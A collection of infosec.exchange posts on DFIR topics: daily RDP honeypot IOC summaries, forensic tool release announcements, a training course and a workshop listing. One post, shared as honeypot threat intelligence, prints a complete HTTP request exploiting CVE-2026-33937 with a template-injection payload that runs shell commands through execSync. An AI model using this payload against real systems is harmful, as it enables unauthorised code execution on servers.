  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 468 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 276; 193.169.194.14 - 57; 111.170.152.113 - 15
    Top ASNs: AS51784 - 276; AS214576 - 57; AS396982 - 45
    Top Accounts: hello - 309; (empty) - 57; Test - 30
    Top ISPs: X-city Customers and Private - 276; Berdiev Ruslan Mukhabatovich - 57; Google LLC - 45
    Top Clients: Unknown - 468
    Top Software: Unknown - 468
    Top Keyboards: Unknown - 468
    Top IP Classification: Unknown - 408; hosting - 48; hosting & proxy - 12
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 312 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 184; 193.169.194.14 - 38; 111.170.152.113 - 10
    Top ASNs: AS51784 - 184; AS214576 - 38; AS396982 - 30
    Top Accounts: hello - 206; (empty) - 38; Test - 20
    Top ISPs: X-city Customers and Private - 184; Berdiev Ruslan Mukhabatovich - 38; Google LLC - 30
    Top Clients: Unknown - 312
    Top Software: Unknown - 312
    Top Keyboards: Unknown - 312
    Top IP Classification: Unknown - 272; hosting - 32; hosting & proxy - 8
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-21 RDP #Honeypot IOCs - 156 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 92; 193.169.194.14 - 19; 111.170.152.113 - 5
    Top ASNs: AS51784 - 92; AS214576 - 19; AS396982 - 15
    Top Accounts: hello - 103; (empty) - 19; Test - 10
    Top ISPs: X-city Customers and Private - 92; Berdiev Ruslan Mukhabatovich - 19; Google LLC - 15
    Top Clients: Unknown - 156
    Top Software: Unknown - 156
    Top Keyboards: Unknown - 156
    Top IP Classification: Unknown - 136; hosting - 16; hosting & proxy - 4
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    abrignoni@infosec.exchange
    Lots of movement happening in the #LEAPPs project. #LAVA (LEAPPs Artifact Viewer App) has been released. New releases for all the LEAPPs. New webpage with all listed releases by tool. No need to jump around GitHub repositories to find the latest executables. Mail list available so you can be the first to know about all the new stuff that is coming. We won't spam you. Sign up for the mailing list here: https://www.leapps.org/#mailing #DigitalForensics #MobileForensics #DFIR
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-19 RDP #Honeypot IOCs - 420 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 99; 193.169.194.14 - 63; 124.222.173.104 - 57
    Top ASNs: AS51784 - 99; AS214576 - 63; AS45090 - 57
    Top Accounts: hello - 204; (empty) - 66; Test - 36
    Top ISPs: X-city Customers and Private - 99; Berdiev Ruslan Mukhabatovich - 63; China Internet Network Information Center - 57
    Top Clients: Unknown - 420
    Top Software: Unknown - 420
    Top Keyboards: Unknown - 420
    Top IP Classification: Unknown - 303; hosting - 90; proxy - 24
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    abrignoni@infosec.exchange
    The new LEAPPS.org webpage is online! New website design in dark mode as all pages should be. Releases page has collapsed the previous releases sections for easier navigation. Just press the bar and the previous releases are accessible. Sign up for our mailing list at the end of the home page. Easy way to keep track of the latest happenings in the LEAPPs & LAVA community. Much more coming up soon! Check it out: https://www.leapps.org/ #DigitalForensics #DFIR #MobileForensics
  • Investigation Scenario 🔎

    Uncategorized investigationpa dfir soc
    1
    0 Votes
    1 Posts
    0 Views
    chrissanders88@infosec.exchange
    Investigation Scenario
    You've discovered a user workstation with the Chrome Remote Desktop plugin installed. There's no business reason for the user to have this plugin, and they don't recall installing it. What do you look for to investigate whether an incident occurred and the extent of its impact? #InvestigationPath #DFIR #SOC
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-08 RDP #Honeypot IOCs - 300 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 45; 104.248.62.230 - 45; 160.187.146.221 - 30
    Top ASNs: AS14061 - 48; AS51784 - 45; AS63949 - 42
    Top Accounts: hello - 156; Test - 39; eltons - 15
    Top ISPs: DigitalOcean, LLC - 48; X-city Customers and Private - 45; Akamai Technologies, Inc. - 42
    Top Clients: Unknown - 300
    Top Software: Unknown - 300
    Top Keyboards: Unknown - 300
    Top IP Classification: Unknown - 153; hosting - 135; proxy - 12
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    rdpsnitch@infosec.exchange
    2026-05-08 RDP #Honeypot IOCs - 200 scans
    Thread with top 3 features in each category and links to the full dataset
    #DFIR #InfoSec
    Top IPs: 46.63.101.233 - 30; 104.248.62.230 - 30; 160.187.146.221 - 20
    Top ASNs: AS14061 - 32; AS51784 - 30; AS63949 - 28
    Top Accounts: hello - 104; Test - 26; eltons - 10
    Top ISPs: DigitalOcean, LLC - 32; X-city Customers and Private - 30; Akamai Technologies, Inc. - 28
    Top Clients: Unknown - 200
    Top Software: Unknown - 200
    Top Keyboards: Unknown - 200
    Top IP Classification: Unknown - 102; hosting - 90; proxy - 8
    Pastebin links with full 24-hr RDP Honeypot IOC Lists: Bad API request, invalid api_dev_key
    #CyberSec #SOC #Blueteam #SecOps #Security
  • 0 Votes
    1 Posts
    0 Views
    heinen@infosec.exchange
    Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937
    Here is a full request:
    POST /api/email/preview HTTP/1.1
    Host: x.x.x.x:8080
    Connection: close
    Content-Length: 585
    Content-Type: application/json
    User-Agent: Go-http-client/1.1

    {"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}
    #dfir #honeypot #infosec #cybersecurity
  • There's a new Hindsight release!

    Uncategorized dfir hindsight chrome bf4sa
    1
    1
    0 Votes
    1 Posts
    4 Views
    ryandfir@infosec.exchange
    There's a new Hindsight release! New features in v2026.04 include:
    - Parsing of Sessions_* and Tabs_* files (SNSS) into both the Timeline and a dedicated "Sessions" tab in the XLSX output
    - Parsing of Platform Notifications (including when shown, clicked, and more!)
    - More fields for URL Visit rows: Categories, Entities, Cluster, Window ID, Tab ID, and Response Code
    More details: https://dfir.blog/hindsight-parses-sessions-and-notifications/
    Release: https://github.com/RyanDFIR/hindsight/releases/tag/v2026.04
    #DFIR #Hindsight #Chrome #BF4SA
  • 0 Votes
    1 Posts
    0 Views
    volatility@infosec.exchange
    @volatility New Release: #volatility3 v2.28.0 - visit https://github.com/volatilityfoundation/volatility3/releases for details and downloads. #memoryforensics #dfir
  • 0 Votes
    1 Posts
    8 Views
    bsidesluxembourg@infosec.exchange
    Fresh Workshop Alert for BSides Luxembourg 2026!
    KUNAI WORKSHOP: HANDS-ON LINUX THREAT DETECTION – Quentin Jerome
    Ready to get your hands dirty with real-world Linux threat detection? This 4-hour hands-on workshop dives deep into Kunai, an open-source security monitoring tool built to bring powerful detection capabilities to Linux environments.
    Starting from the basics, you’ll deploy and configure Kunai, explore its architecture, and learn how to monitor and interpret system activity. Then, level up with advanced techniques: writing custom detection rules, integrating Indicators of Compromise (IoCs), and connecting with MISP for enriched threat intelligence.
    Through practical exercises and real-world scenarios, you’ll gain the skills needed to detect, investigate, and respond to threats across Linux systems, whether in production or research environments.
    Quentin Jerome is a Rust developer at CIRCL, focused on building open-source security tools for threat detection and incident response, with a passion for solving real-world security challenges.
    Conference Dates: 6–8 May 2026 | 09:00–18:00
    14, Porte de France, Esch-sur-Alzette, Luxembourg
    Tickets: https://2026.bsides.lu/tickets/
    Schedule: https://hackertracker.app/schedule?conf=BSIDESLUX2026
    #BSidesLuxembourg2026 #Workshop #LinuxSecurity #ThreatDetection #DFIR #OpenSource
  • 0 Votes
    1 Posts
    0 Views
    alonso_reydes@infosec.exchange
    The Autopsy Digital Forensics course is permanently available in the virtual classroom for immediate access. WhatsApp: https://wa.me/51949304030 https://www.reydes.com/e/Curso_Forense_de_Autopsy #digitalforensics #dfir #diskforensics #incidentresponse #forensictools #datacarving #cybercrime
  • Drone and UAV Forensic

    Uncategorized drone uav opensource dfir threatintellige
    1
    0 Votes
    1 Posts
    4 Views
    adulau@infosec.exchange
    Drone and UAV Forensic
    This repository is designed to accelerate the forensic analysis of DIY FPV drones and to help automate technical reporting from seized or recovered artifacts. The goal is pragmatic: extract useful evidence faster, normalize outputs, and produce data that can be reused in reports or shared into investigative platforms such as MISP.
    https://github.com/CIRCL/Drone-Forensic
    #drone #uav #opensource #dfir #threatintelligence #threatintel #misp #digitalforensics @circl @misp